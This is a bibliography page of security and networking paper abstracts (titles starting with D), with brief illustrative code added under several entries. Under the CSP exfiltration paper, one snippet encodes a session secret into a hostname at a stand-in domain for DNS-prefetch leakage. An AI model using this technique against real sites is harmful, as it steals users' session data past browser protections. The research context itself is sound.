Biblio

Found 722 results

Filters: First Letter Of Title is D
D
Salman, A., Elhajj, I.H., Chehab, A., Kayssi, A..  2014.  DAIDS: An Architecture for Modular Mobile IDS. Advanced Information Networking and Applications Workshops (WAINA), 2014 28th International Conference on. :328-333.

The popularity of mobile devices and the enormous number of third-party mobile applications in the market have naturally led to several vulnerabilities being identified and abused. This is coupled with the immaturity of intrusion detection system (IDS) technology targeting mobile devices. In this paper we propose a modular host-based IDS framework for mobile devices that uses behavior analysis to profile applications on the Android platform. Anomaly detection can then be used to categorize malicious behavior and alert users. The proposed system accommodates different detection algorithms, and is being tested at a major telecom operator in North America. This paper highlights the architecture, findings, and lessons learned.

Mallik, Nilanjan, Wali, A. S., Kuri, Narendra.  2016.  Damage Location Identification Through Neural Network Learning from Optical Fiber Signal for Structural Health Monitoring. Proceedings of the 5th International Conference on Mechatronics and Control Engineering. :157–161.

The present work deals with prediction of damage location in a composite cantilever beam using the signal from an optical fiber sensor coupled with a neural network with a back-propagation-based learning mechanism. The experimental study uses a glass/epoxy composite cantilever beam. A notch perpendicular to the axis of the beam and spanning the width of the beam is introduced at three different locations: at the middle of the span, towards the free end of the beam, and towards the fixed end of the beam. A plastic optical fiber of 6 cm gauge length is mounted on the top surface of the beam along its axis, exactly at mid-span. A He-Ne laser is used as the light source for the optical fiber, and the light emerging from the other end of the fiber is converted to an electrical signal through a converter. A three-layer feed-forward neural network architecture is adopted, with one input layer, one hidden layer and one output layer. Three features are extracted from the signal: resonance frequency, normalized amplitude and normalized area under the resonance frequency. These three features act as inputs to the neural network input layer. The outputs qualitatively identify the location of the notch.
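
For illustration only, a minimal sketch (not the authors' implementation) of a three-layer feed-forward classifier mapping the three extracted features to a notch location; the feature values, hidden-layer size and class labels below are assumptions made up for the example.

```python
# Minimal sketch of a three-layer feed-forward network (input, one hidden,
# output layer) trained with gradient-based learning, mapping the three
# signal features to one of the three notch locations. All values are made up.
import numpy as np
from sklearn.neural_network import MLPClassifier

# columns: resonance frequency (Hz), normalized amplitude, normalized area
X = np.array([
    [42.0, 0.91, 0.78],   # hypothetical "mid-span" samples
    [41.5, 0.89, 0.80],
    [55.0, 0.60, 0.52],   # hypothetical "free-end" samples
    [54.2, 0.63, 0.55],
    [30.0, 0.97, 0.90],   # hypothetical "fixed-end" samples
    [31.1, 0.95, 0.88],
])
y = ["mid-span", "mid-span", "free-end", "free-end", "fixed-end", "fixed-end"]

clf = MLPClassifier(hidden_layer_sizes=(8,), max_iter=2000, random_state=0)
clf.fit(X, y)
print(clf.predict([[41.8, 0.90, 0.79]]))  # expected: 'mid-span'
```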

Redmiles, Elissa M., Mazurek, Michelle L., Dickerson, John P..  2018.  Dancing Pigs or Externalities?: Measuring the Rationality of Security Decisions. Proceedings of the 2018 ACM Conference on Economics and Computation. :215-232.

Accurately modeling human decision-making in security is critical to thinking about when, why, and how to recommend that users adopt certain secure behaviors. In this work, we conduct behavioral economics experiments to model the rationality of end-user security decision-making in a realistic online experimental system simulating a bank account. We ask participants to make a financially impactful security choice, in the face of transparent risks of account compromise and benefits offered by an optional security behavior (two-factor authentication). We measure the cost and utility of adopting the security behavior via measurements of time spent executing the behavior and estimates of the participant's wage. We find that more than 50% of our participants made rational (e.g., utility optimal) decisions, and we find that participants are more likely to behave rationally in the face of higher risk. Additionally, we find that users' decisions can be modeled well as a function of past behavior (anchoring effects), knowledge of costs, and to a lesser extent, users' awareness of risks and context (R2=0.61). We also find evidence of endowment effects, as seen in other areas of economic and psychological decision-science literature, in our digital-security setting. Finally, using our data, we show theoretically that a "one-size-fits-all" emphasis on security can lead to market losses, but that adoption by a subset of users with higher risks or lower costs can lead to market gains.

Mueller, Tobias, Klotzsche, Daniel, Herrmann, Dominik, Federrath, Hannes.  2019.  Dangers and Prevalence of Unprotected Web Fonts. 2019 International Conference on Software, Telecommunications and Computer Networks (SoftCOM). :1—5.
Most Web sites rely on resources hosted by third parties such as CDNs. Third parties may be compromised or coerced into misbehaving, e.g. delivering a malicious script or stylesheet. Unexpected changes to resources hosted by third parties can be detected with the Subresource Integrity (SRI) mechanism. The focus of SRI is on scripts and stylesheets. Web fonts cannot be secured with that mechanism under all circumstances. The first contribution of this paper is to evaluate the potential for attacks using malicious fonts. With an instrumented browser we find that (1) more than 95% of the top 50,000 Web sites of the Tranco top list rely on resources hosted by third parties and that (2) only a small fraction employs SRI. Moreover, we find that more than 60% of the sites in our sample use fonts hosted by third parties, most of which are being served by Google. The second contribution of the paper is a proof of concept of a malicious font as well as a tool for automatically generating such a font, which targets security-conscious users who are used to verifying cryptographic fingerprints. Software vendors publish such fingerprints along with their software packages to allow users to verify their integrity. Due to incomplete SRI support for Web fonts, a third party could force a browser to load our malicious font. The font targets a particular cryptographic fingerprint and renders it as a desired different fingerprint. This allows attackers to fool users into believing that they download a genuine software package although they are actually downloading a maliciously modified version. Finally, we propose countermeasures that could be deployed to protect the integrity of Web fonts.
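
As a hedged illustration of the SRI mechanism the abstract refers to, the sketch below computes an SRI digest for a locally saved font file; the file name is hypothetical, while the digest format (sha384 prefix, base64 of the raw hash) follows the SRI specification.

```python
# Compute a Subresource Integrity (SRI) value for a local file.
# The file name is a placeholder; as the paper notes, fonts loaded via
# CSS @font-face cannot always be covered by SRI.
import base64
import hashlib

def sri_sha384(path: str) -> str:
    with open(path, "rb") as f:
        digest = hashlib.sha384(f.read()).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")

print(sri_sha384("webfont.woff2"))  # value to place in an integrity attribute
```
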
Rafiuddin, M. F. B., Minhas, H., Dhubb, P. S..  2017.  A dark web story in-depth research and study conducted on the dark web based on forensic computing and security in Malaysia. 2017 IEEE International Conference on Power, Control, Signals and Instrumentation Engineering (ICPCSI). :3049–3055.
The following is research conducted on the Dark Web to study and identify the ins and outs of the dark web: what the dark web is all about, the various methods available to access the dark web, and more. The researchers have also included the steps and precautions taken before accessing the dark web. Apart from that, the findings and the website links/URLs are also included, along with a description of the sites. The primary usage of the dark web and some of the researchers' experience are further documented in this research paper.
Tian, Zhao, Wright, Kevin, Zhou, Xia.  2016.  The DarkLight Rises: Visible Light Communication in the Dark. Proceedings of the 22nd Annual International Conference on Mobile Computing and Networking. :2–15.

Visible Light Communication (VLC) emerges as a new wireless communication technology with appealing benefits not present in radio communication. However, current VLC designs commonly require LED lights to emit shining light beams, which greatly limits the applicable scenarios of VLC (e.g., on a sunny day when indoor lighting is not needed). It also entails high energy overhead and unpleasant visual experiences for mobile devices to transmit data using VLC. We design and develop DarkLight, a new VLC primitive that allows light-based communication to be sustained even when LEDs emit extremely low luminance. The key idea is to encode data into ultra-short, imperceptible light pulses. We tackle challenges in circuit designs, data encoding/decoding schemes, and DarkLight networking, to efficiently generate and reliably detect ultra-short light pulses using off-the-shelf, low-cost LEDs and photodiodes. Our DarkLight prototype supports 1.3-m distance with 1.6-Kbps data rate. By loosening up VLC's reliance on visible light beams, DarkLight presents an unconventional direction of VLC design and fundamentally broadens VLC's application scenarios.

Ibrahim, Ahmad, Sadeghi, Ahmad-Reza, Tsudik, Gene, Zeitouni, Shaza.  2016.  DARPA: Device Attestation Resilient to Physical Attacks. Proceedings of the 9th ACM Conference on Security & Privacy in Wireless and Mobile Networks. :171–182.

As embedded devices (under the guise of "smart-whatever") rapidly proliferate into many domains, they become attractive targets for malware. Protecting them from software and physical attacks becomes both important and challenging. Remote attestation is a basic tool for mitigating such attacks. It allows a trusted party (verifier) to remotely assess software integrity of a remote, untrusted, and possibly compromised, embedded device (prover). Prior remote attestation methods focus on software (malware) attacks in a one-verifier/one-prover setting. Physical attacks on provers are generally ruled out as being either unrealistic or impossible to mitigate. In this paper, we argue that physical attacks must be considered, particularly in the context of many provers, e.g., a network of devices. Assuming that physical attacks require capture and subsequent temporary disablement of the victim device(s), we propose DARPA, a light-weight protocol that takes advantage of absence detection to identify suspected devices. DARPA is resilient against a very strong adversary and imposes minimal additional hardware requirements. We justify and identify DARPA's design goals and evaluate its security and costs.
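
A toy sketch of the absence-detection idea the abstract mentions, not the DARPA protocol itself: devices are expected to report periodically, and a gap longer than a threshold marks a device as suspected of having been captured. The heartbeat interval, threshold and timestamps are assumptions for illustration.

```python
# Toy absence detection: a prover silent for longer than MAX_GAP seconds is
# flagged as a suspect (possible capture/physical tampering). Values are made up.
MAX_GAP = 10.0  # illustrative threshold in seconds

def suspected_devices(heartbeats: dict[str, list[float]], now: float) -> set[str]:
    suspects = set()
    for device, times in heartbeats.items():
        times = sorted(times)
        gaps = [b - a for a, b in zip(times, times[1:])] + [now - times[-1]]
        if any(g > MAX_GAP for g in gaps):
            suspects.add(device)
    return suspects

logs = {"prover-1": [0.0, 9.0, 18.0, 27.0], "prover-2": [0.0, 8.0, 16.0]}
print(suspected_devices(logs, now=30.0))  # prover-2 was silent for 14 s
```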

Dridi, M., Rubini, S., Lallali, M., Florez, M. J. S., Singhoff, F., Diguet, J. P..  2017.  DAS: An Efficient NoC Router for Mixed-Criticality Real-Time Systems. 2017 IEEE International Conference on Computer Design (ICCD). :229–232.

Mixed-Criticality Systems (MCS) are real-time systems characterized by two or more distinct levels of criticality. In MCS, it is imperative that high-critical flows meet their deadlines while low-critical flows can tolerate some delays. Sharing resources between flows in a Network-On-Chip (NoC) can lead to different unpredictable latencies and subsequently complicate the implementation of MCS in many-core architectures. This paper proposes a new virtual channel router designed for MCS deployed over NoCs. The first objective of this router is to reduce the worst-case communication latency of high-critical flows. The second aim is to improve the network use rate and reduce the communication latency for low-critical flows. The proposed router, called DAS (Double Arbiter and Switching router), jointly uses Wormhole and Store And Forward techniques for low- and high-critical flows respectively. Simulations with a cycle-accurate SystemC NoC simulator show that, with a 15% network use rate, the communication delay of high-critical flows is reduced by 80% while the communication delay of low-critical flows is increased by 18% compared to usual solutions based on routers with multiple virtual channels.

Guanyu, Chen, Yunjie, Han, Chang, Li, Changrui, Lin, Degui, Fang, Xiaohui, Rong.  2019.  Data Acquisition Network and Application System Based on 6LoWPAN and IPv6 Transition Technology. 2019 IEEE 2nd International Conference on Electronics Technology (ICET). :78–83.
In recent years, IPv6 has been gradually replacing IPv4, driven by IPv4 address exhaustion and the rapid development of Low-Power Wide-Area Network (LPWAN) wireless communication technology. This paper proposes a data acquisition and application system based on 6LoWPAN and IPv6 transition technology. The system uses 6LoWPAN and a 6to4 tunnel to integrate the internal sensor network with the Internet, improving the adaptability of the gateway and reducing the average forwarding delay and packet loss rate of small data packets. Moreover, we design and implement the functions of device access management, multiservice data storage and affair data service by combining the C/S architecture with actual uploaded river quality data. The system has the advantages of flexible networking, low power consumption, a rich IPv6 address space, high communication security, and strong reusability.
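
To clarify the 6to4 transition mechanism mentioned above: a site's /48 IPv6 prefix is derived from its public IPv4 address by prepending 2002::/16 (RFC 3056). A small sketch, with an example IPv4 address chosen for illustration:

```python
# Derive the 6to4 /48 prefix from a public IPv4 address (RFC 3056).
import ipaddress

def sixtofour_prefix(ipv4: str) -> str:
    p = ipaddress.IPv4Address(ipv4).packed
    return f"2002:{p[0]:02x}{p[1]:02x}:{p[2]:02x}{p[3]:02x}::/48"

print(sixtofour_prefix("192.0.2.1"))  # -> 2002:c000:0201::/48
```
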
Wen, M., Zhang, X., Li, H., Li, J..  2017.  A Data Aggregation Scheme with Fine-Grained Access Control for the Smart Grid. 2017 IEEE 86th Vehicular Technology Conference (VTC-Fall). :1–5.

With the rapid development of the smart grid, smart meters are deployed at energy consumers' premises to collect real-time usage data. Although such a communication model can help the control center of the energy producer to improve the efficiency and reliability of electricity delivery, it also leads to some security issues. For example, this real-time data involves the customers' privacy. Attackers may violate the privacy for house breaking, or they may tamper with the transmitted data for their own benefit. For this purpose, many data aggregation schemes have been proposed for privacy preservation. However, few of them address both data aggregation and fine-grained access control to improve data utility. In this paper, we propose a data aggregation scheme based on an attribute decision tree. Security analysis illustrates that our scheme can achieve data integrity, data privacy preservation and fine-grained data access control. Experimental results show that our scheme is more efficient than existing schemes.

Sen, Amartya, Madria, Sanjay.  2018.  Data Analysis of Cloud Security Alliance's Security, Trust & Assurance Registry. Proceedings of the 19th International Conference on Distributed Computing and Networking. :42:1–42:10.
The security of clients' applications on cloud platforms has been of great interest. Security concerns associated with cloud computing are being addressed in both domains: security issues faced by cloud providers and security issues faced by clients. However, security concerns still remain in areas like cloud auditing and migrating application components to the cloud to make the process more secure and cost-efficient. To an extent, this can be attributed to a lack of detailed information being publicly available about the cloud platforms and their security policies. A resolution in this regard can be found in the Cloud Security Alliance's Security, Trust, and Assurance Registry (STAR), which documents the security controls provided by popular cloud computing offerings. In this paper, we perform descriptive analysis on STAR data in an attempt to comprehend the information publicly presented by different cloud providers. The aim is to help clients more effectively search and analyze the security information they need for the decision-making process when hosting their applications on the cloud. Based on the analysis, we outline some augmentations that can be made to STAR as well as certain specific design improvements for a cloud migration risk assessment framework.
Khan, Iqra, Durad, Hanif, Alam, Masoom.  2019.  Data Analytics Layer For high-interaction Honeypots. 2019 16th International Bhurban Conference on Applied Sciences and Technology (IBCAST). :681–686.

The security of VMs is now becoming a hot topic due to their outsourcing in the cloud computing paradigm. All VMs present on the network are connected to each other, making exploited VMs a danger to other VMs and a threat to the organization. The rejuvenation of virtualization brought about the emergence of hypervisor-based security services like VMI (virtual machine introspection), since any intrusion detection system running on the same system has a greater chance of being disabled by the malware or attacker. Monitoring VMs using VMI is one of the most researched and accepted techniques for ensuring computer system security, mostly in the cloud computing paradigm. This work integrates LibVMI with Volatility on KVM, a Linux-based hypervisor, to introspect the memory of VMs. Both of these tools are used to monitor the state of live VMs. The VMI capability of monitoring VMs is combined with malware analysis and virtual honeypots to achieve the objective of this project. A testing environment is deployed in which a network of VMs is introspected using Volatility plug-ins. The execution time of each plug-in run on live VMs is measured to observe the performance of the Volatility plug-ins. All these VMs are deployed as virtual honeypots, which are used as a detection mechanism to trigger alerts when malware attacks the VMs. Using STIX (Structured Threat Information eXpression), extracted IOCs are converted into an understandable, flexible, structured and shareable format.
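
A hedged sketch of how per-plugin execution time could be measured, as described in the abstract; the Volatility command line, plugin names and memory-image path below are assumptions that depend on the Volatility version and the LibVMI/KVM setup.

```python
# Time a set of Volatility plug-ins against a memory image by invoking the
# tool as a subprocess. Command, plug-in names and image path are placeholders.
import subprocess
import time

PLUGINS = ["pslist", "netscan", "malfind"]  # illustrative plugin names

def time_plugin(image: str, plugin: str) -> float:
    start = time.perf_counter()
    subprocess.run(["vol.py", "-f", image, plugin],
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=False)
    return time.perf_counter() - start

for p in PLUGINS:
    print(p, f"{time_plugin('vm-memory.raw', p):.2f} s")
```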

Yao, Danfeng(Daphne).  2018.  Data Breach and Multiple Points to Stop It. Proceedings of the 23rd ACM Symposium on Access Control Models and Technologies. :1–1.
Preventing unauthorized access to sensitive data is an exceedingly complex access control problem. In this keynote, I will break down the data breach problem and give insights into what organizations could and should do to reduce their risks. The talk will start with discussing the technical reasons behind some of the recent high-profile data breach incidents (e.g., in Equifax, Target), as well as pointing out the threats of inadvertent or accidental data leaks. Then, I will show that there are usually multiple points to stop data breach and give an overview of the relevant state-of-the-art solutions. I will focus on some of the recent algorithmic advances in preventing inadvertent data loss, including set-based and alignment-based screening techniques, outsourced screening, and GPU-based performance acceleration. I will also briefly discuss the role of non-technical factors (e.g., organizational culture on security) in data protection. Because of the cat-and-mouse-game nature of cybersecurity, achieving absolute data security is impossible. However, proactively securing critical data paths through strategic planning and placement of security tools will help reduce the risks. I will also point out a few exciting future research directions, e.g., on data leak detection as a cloud security service and deep learning for reducing false alarms in continuous authentication and the prickly insider-threat detection.
Liu, Ying, He, Qiang, Zheng, Dequan, Zhang, Mingwei, Chen, Feifei, Zhang, Bin.  2019.  Data Caching Optimization in the Edge Computing Environment. 2019 IEEE International Conference on Web Services (ICWS). :99–106.

With the rapid increase in the use of mobile devices in people's daily lives, mobile data traffic has been exploding in recent years. In the edge computing environment, where edge servers are deployed around mobile users, caching popular data on edge servers can ensure mobile users' fast access to those data and reduce the data traffic between mobile users and the centralized cloud. Existing studies consider the data caching problem with a focus on the reduction of network delay and the improvement of mobile devices' energy efficiency. In this paper, we attack the data caching problem in the edge computing environment from the service providers' perspective, who would like to maximize their revenue from caching their data. This problem is complicated because data caching produces benefits at a cost and there usually is a trade-off in between. In this paper, we formulate the data caching problem as an integer programming problem that maximizes the revenue of the service provider while satisfying a constraint on data access latency. Extensive experiments are conducted on a real-world dataset that contains the locations of edge servers and mobile users, and the results reveal that our approach significantly outperforms the baseline approaches.
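
A minimal sketch of the kind of integer-programming formulation the abstract describes, not the paper's actual model: binary variables select which items to cache to maximize revenue. For simplicity the constraint here is a storage budget rather than the paper's latency constraint, and all numbers are made up.

```python
# Choose data items to cache on an edge server to maximize provider revenue
# subject to a capacity budget (illustrative stand-in for the latency constraint).
import pulp

revenue = {"d1": 9.0, "d2": 4.0, "d3": 6.0}   # revenue if the item is cached
size    = {"d1": 3.0, "d2": 1.0, "d3": 2.0}   # storage each item needs
CAPACITY = 4.0

prob = pulp.LpProblem("edge_caching", pulp.LpMaximize)
x = {d: pulp.LpVariable(f"cache_{d}", cat="Binary") for d in revenue}
prob += pulp.lpSum(revenue[d] * x[d] for d in revenue)        # objective
prob += pulp.lpSum(size[d] * x[d] for d in size) <= CAPACITY  # budget constraint
prob.solve(pulp.PULP_CBC_CMD(msg=False))
print([d for d in revenue if x[d].value() == 1])              # e.g. ['d1', 'd2']
```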

Jayasinghe, U., Otebolaku, A., Um, T. W., Lee, G. M..  2017.  Data centric trust evaluation and prediction framework for IOT. 2017 ITU Kaleidoscope: Challenges for a Data-Driven Society (ITU K). :1–7.

The application of trust principles in the Internet of Things (IoT) has made it possible to provide more trustworthy services among the corresponding stakeholders. The most common method of assessing trust in IoT applications is to estimate the trust level of the end entities (entity-centric) relative to the trustor. In these systems, the trust level of the data is assumed to be the same as the trust level of the data source. However, most IoT-based systems are data-centric and operate in dynamic environments, which need immediate actions without waiting for a trust report from end entities. We address this challenge by extending our previous proposals on trust establishment for entities, based on their reputation, experience and knowledge, to trust estimation of data items [1-3]. First, we present a hybrid trust framework for evaluating both data trust and entity trust, which can be advanced towards standardization for a future data-driven society. The modules, including data trust metric extraction, data trust aggregation, evaluation and prediction, are elaborated inside the proposed framework. Finally, a possible design model is described to implement the proposed ideas.

Chu, Xu, Ilyas, Ihab F., Krishnan, Sanjay, Wang, Jiannan.  2016.  Data Cleaning: Overview and Emerging Challenges. Proceedings of the 2016 International Conference on Management of Data. :2201–2206.

Detecting and repairing dirty data is one of the perennial challenges in data analytics, and failure to do so can result in inaccurate analytics and unreliable decisions. Over the past few years, there has been a surge of interest from both industry and academia on data cleaning problems including new abstractions, interfaces, approaches for scalability, and statistical techniques. To better understand the new advances in the field, we will first present a taxonomy of the data cleaning literature in which we highlight the recent interest in techniques that use constraints, rules, or patterns to detect errors, which we call qualitative data cleaning. We will describe the state-of-the-art techniques and also highlight their limitations with a series of illustrative examples. While traditionally such approaches are distinct from quantitative approaches such as outlier detection, we also discuss recent work that casts such approaches into a statistical estimation framework including: using Machine Learning to improve the efficiency and accuracy of data cleaning and considering the effects of data cleaning on statistical analysis.
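
A small illustration of the rule- and constraint-based ("qualitative") error detection the survey discusses: rows violating an assumed functional dependency zip -> city are flagged as potentially dirty. The data values and the dependency are made up for the example.

```python
# Flag rows that violate the functional dependency zip -> city.
import pandas as pd

df = pd.DataFrame({
    "zip":  ["60601", "60601", "10001", "10001"],
    "city": ["Chicago", "Chicago", "New York", "Newyork"],  # last row is dirty
})

# a zip code mapping to more than one distinct city violates zip -> city
counts = df.groupby("zip")["city"].nunique()
violating_zips = counts[counts > 1].index
print(df[df["zip"].isin(violating_zips)])  # candidate dirty rows for repair
```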

Feng, Chenwei, Wang, Xianling, Zhang, Zewang.  2018.  Data Compression Scheme Based on Discrete Sine Transform and Lloyd-Max Quantization. Proceedings of the 3rd International Conference on Intelligent Information Processing. :46-51.

With the increase in mobile equipment and transmission data, the Common Public Radio Interface (CPRI) between the Building Baseband Unit (BBU) and the Remote Radio Unit (RRU) carries ever-increasing amounts of transmission data. It is essential to compress the data on the CPRI if more data is to be transferred without congestion while limiting fiber consumption. A data compression scheme based on the Discrete Sine Transform (DST) and Lloyd-Max quantization is proposed for the distributed Base Station (BS) architecture. The time-domain samples are transformed by DST according to the characteristics of Orthogonal Frequency Division Multiplexing (OFDM) baseband signals, and then the coefficients after transformation are quantized by the Lloyd-Max quantizer. The simulation results show that the proposed scheme can work at various Compression Ratios (CRs) while the values of Error Vector Magnitude (EVM) are better than the limits in 3GPP.
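
A rough sketch of the transform-then-quantize idea, not the paper's scheme: a DST of a baseband block followed by a simple Lloyd-Max-style (k-means-like) scalar quantizer. The block length, number of quantization levels and the random test signal are arbitrary choices made for illustration.

```python
# DST of a block of samples, Lloyd-Max-style scalar quantization of the
# coefficients, inverse DST, and a crude EVM estimate of the distortion.
import numpy as np
from scipy.fft import dst, idst

def lloyd_max(x, levels=8, iters=50):
    centers = np.linspace(x.min(), x.max(), levels)
    for _ in range(iters):
        idx = np.argmin(np.abs(x[:, None] - centers[None, :]), axis=1)
        for k in range(levels):
            if np.any(idx == k):
                centers[k] = x[idx == k].mean()
    idx = np.argmin(np.abs(x[:, None] - centers[None, :]), axis=1)
    return centers[idx], centers

rng = np.random.default_rng(0)
block = rng.standard_normal(256)              # stand-in for OFDM time samples
coeffs = dst(block, type=2, norm="ortho")     # forward transform
quantized, centers = lloyd_max(coeffs)        # quantize coefficients
recovered = idst(quantized, type=2, norm="ortho")
evm = np.linalg.norm(recovered - block) / np.linalg.norm(block)
print(f"EVM ~ {evm:.3f}")
```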

Thuraisingham, B., Kantarcioglu, M., Hamlen, K., Khan, L., Finin, T., Joshi, A., Oates, T., Bertino, E..  2016.  A Data Driven Approach for the Science of Cyber Security: Challenges and Directions. 2016 IEEE 17th International Conference on Information Reuse and Integration (IRI). :1–10.

This paper describes a data driven approach to studying the science of cyber security (SoS). It argues that science is driven by data. It then describes issues and approaches towards the following three aspects: (i) Data Driven Science for Attack Detection and Mitigation, (ii) Foundations for Data Trustworthiness and Policy-based Sharing, and (iii) A Risk-based Approach to Security Metrics. We believe that the three aspects addressed in this paper will form the basis for studying the Science of Cyber Security.

Jeyakumar, Vimalkumar, Madani, Omid, ParandehGheibi, Ali, Yadav, Navindra.  2016.  Data Driven Data Center Network Security. Proceedings of the 2016 ACM on International Workshop on Security And Privacy Analytics. :48–48.

Large scale datacenters are becoming the compute and data platform of large enterprises, but their scale makes it difficult to secure the applications running within them. We motivate this setting using a complex real-world scenario, and propose a data-driven approach to taming this complexity. We discuss several machine learning problems that arise, in particular focusing on inducing so-called whitelist communication policies from observing masses of communications among networked computing nodes. Briefly, a whitelist policy specifies which machine, or groups of machines, can talk to which. We present some of the challenges and opportunities, such as noisy and incomplete data, non-stationarity, lack of supervision, and challenges of evaluation, and describe some of the approaches we have found promising.
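
A toy sketch of whitelist-policy induction as described above: observe (source, destination) flows during a learning phase, then alert on any flow outside the learned whitelist. Host names and flows are made-up examples.

```python
# Learn a whitelist from observed flows, then check new flows against it.
observed = [("web-1", "db-1"), ("web-2", "db-1"), ("web-1", "cache-1")]
whitelist = set(observed)  # "which machine can talk to which"

def check(flow: tuple[str, str]) -> str:
    return "allowed" if flow in whitelist else "ALERT: not in whitelist"

print(check(("web-2", "db-1")))    # allowed
print(check(("web-1", "ldap-1")))  # ALERT: not in whitelist
```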

Oertel, Catharine, Gustafson, Joakim, Black, Alan W..  2016.  On Data Driven Parametric Backchannel Synthesis for Expressing Attentiveness in Conversational Agents. Proceedings of the Workshop on Multimodal Analyses Enabling Artificial Agents in Human-Machine Interaction. :43–47.

In this study, we use a multi-party recording as a template for building a parametric speech synthesiser which is able to express different levels of attentiveness in backchannel tokens. This allowed us to investigate i) whether it is possible to express the same perceived level of attentiveness in synthesised backchannels as in natural ones; ii) whether it is possible to increase and decrease the perceived level of attentiveness of backchannels beyond the range observed in the original corpus.

Bessa, Ricardo J., Rua, David, Abreu, Cláudia, Machado, Paulo, Andrade, José R., Pinto, Rui, Gonçalves, Carla, Reis, Marisa.  2018.  Data Economy for Prosumers in a Smart Grid Ecosystem. Proceedings of the Ninth International Conference on Future Energy Systems. :622–630.

Smart grid technologies are enablers of new business models for domestic consumers with local flexibility (generation, loads, storage), where access to data is a key requirement in the value stream. However, legislation on personal data privacy and protection imposes the need to develop local models for flexibility modeling and forecasting and to exchange models instead of personal data. This paper describes the functional architecture of a home energy management system (HEMS) and its optimization functions. A set of data-driven models, embedded in the HEMS, are discussed for improving renewable energy forecasting skill and modeling multi-period flexibility of distributed energy resources.

Van Acker, Steven, Hausknecht, Daniel, Sabelfeld, Andrei.  2016.  Data Exfiltration in the Face of CSP. Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security. :853–864.

Cross-site scripting (XSS) attacks keep plaguing the Web. Supported by most modern browsers, Content Security Policy (CSP) prescribes the browser to restrict the features and communication capabilities of code on a web page, mitigating the effects of XSS.

This paper puts a spotlight on the problem of data exfiltration in the face of CSP. We bring attention to the unsettling discord in the security community about the very goals of CSP when it comes to preventing data leaks.

As a consequence of this discord, we report on insecurities in the known protection mechanisms that are based on assumptions about CSP that turn out not to hold in practice.

To illustrate the practical impact of the discord, we perform a systematic case study of data exfiltration via DNS prefetching and resource prefetching in the face of CSP.

Our study of the popular browsers demonstrates that it is often possible to exfiltrate data by both resource prefetching and DNS prefetching in the face of CSP. Further, we perform a crawl of the top 10,000 Alexa domains to report on the coexistence of CSP and prefetching in practice. Finally, we discuss directions to control data exfiltration and, for the case study, propose measures ranging from immediate fixes for the clients to prefetching-aware extensions of CSP.
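
For illustration of the DNS-prefetching channel discussed above (not code from the paper): data can be smuggled past a CSP by encoding it into a hostname whose lookup reaches an attacker-controlled resolver. The domain and secret below are placeholders.

```python
# Encode a secret into a DNS label so that a dns-prefetch lookup leaks it
# to whoever controls the authoritative resolver for the chosen domain.
import base64

secret = b"session=abc123"
label = base64.b32encode(secret).decode().rstrip("=").lower()
hostname = f"{label}.exfil.example"  # resolver for exfil.example sees the data

# the injected markup would resemble: <link rel="dns-prefetch" href="//{hostname}">
print(hostname)
```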

Chatterjee, Tanusree, Ruj, Sushmita, DasBit, Sipra.  2018.  Data forwarding and update propagation in grid network for NDN: A low-overhead approach. 2018 IEEE International Conference on Advanced Networks and Telecommunications Systems (ANTS). :1–6.
Nowadays, the Internet has become mostly content-centric. Named Data Networking (NDN) has emerged as a promising candidate to cope with the use of today's Internet. Several NDN features, such as in-network caching and easier data forwarding in the routing method, bring potential advantages over conventional networks. Despite these advantages, there are many challenges in NDN which are yet to be addressed. In this paper, we address two such challenges in NDN routing: (1) huge storage overhead in the NDN router, and (2) high communication overheads in the network during propagation of routing information updates. We propose changes to existing NDN routing with the aim of providing a low-overhead solution to these problems. Here, instead of storing the Link State Database (LSDB) in all routers, it is kept only in selected special nodes. The use of special nodes lowers the overall storage and update overheads. We also provide supporting algorithms for data forwarding and update for grid networks. The performance of the proposed method is evaluated in terms of storage and communication overheads. The results show the overheads are reduced by almost one third compared to the existing routing method in NDN.
Khobragade, P.K., Malik, L.G..  2014.  Data Generation and Analysis for Digital Forensic Application Using Data Mining. Communication Systems and Network Technologies (CSNT), 2014 Fourth International Conference on. :458-462.

Cyber crime produces huge volumes of log and transactional data, which leaves plenty of data to store and analyze. It is difficult for forensic investigators to spend so much time finding clues and analyzing those data. Network forensic analysis involves network traces and the detection of attacks. The traces involve Intrusion Detection System and firewall logs, logs generated by network services and applications, and packet captures by sniffers. Because a large amount of data is generated by every event in the network, it is difficult for forensic investigators to find clues and analyze those data. Network forensics deals with the monitoring, capturing, recording, and analysis of network traffic for detecting intrusions and investigating them. This paper focuses on data collection from the cyber system and the web browser. FTK 4.0 is discussed for memory forensic analysis and remote system forensics, which are to be used as evidence for aiding investigation.

Luo, Chu, Fylakis, Angelos, Partala, Juha, Klakegg, Simon, Goncalves, Jorge, Liang, Kaitai, Seppänen, Tapio, Kostakos, Vassilis.  2016.  A Data Hiding Approach for Sensitive Smartphone Data. Proceedings of the 2016 ACM International Joint Conference on Pervasive and Ubiquitous Computing. :557–568.

We develop and evaluate a data hiding method that enables smartphones to encrypt and embed sensitive information into carrier streams of sensor data. Our evaluation considers multiple handsets and a variety of data types, and we demonstrate that our method has a computational cost that allows real-time data hiding on smartphones with negligible distortion of the carrier stream. These characteristics make it suitable for smartphone applications involving privacy-sensitive data such as medical monitoring systems and digital forensics tools.
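
A minimal sketch of the general data-hiding idea (not the paper's method): bits of a sensitive message are embedded in the least-significant bits of an integer-valued sensor stream, keeping distortion of the carrier negligible. The carrier values and message bits are made up for illustration.

```python
# Hide message bits in the least-significant bits of a sensor stream and
# recover them on the receiver side; distortion is at most one unit per sample.
import numpy as np

carrier = np.array([1021, 1018, 1025, 1030, 1019, 1022, 1027, 1024], dtype=np.int64)
bits = [1, 0, 1, 1, 0, 0, 1, 0]            # message bits (e.g. from encrypted data)

stego = (carrier & ~1) | np.array(bits)    # overwrite each LSB with a message bit
recovered = (stego & 1).tolist()           # extraction at the receiver

assert recovered == bits
print(np.max(np.abs(stego - carrier)))     # worst-case distortion of the carrier
```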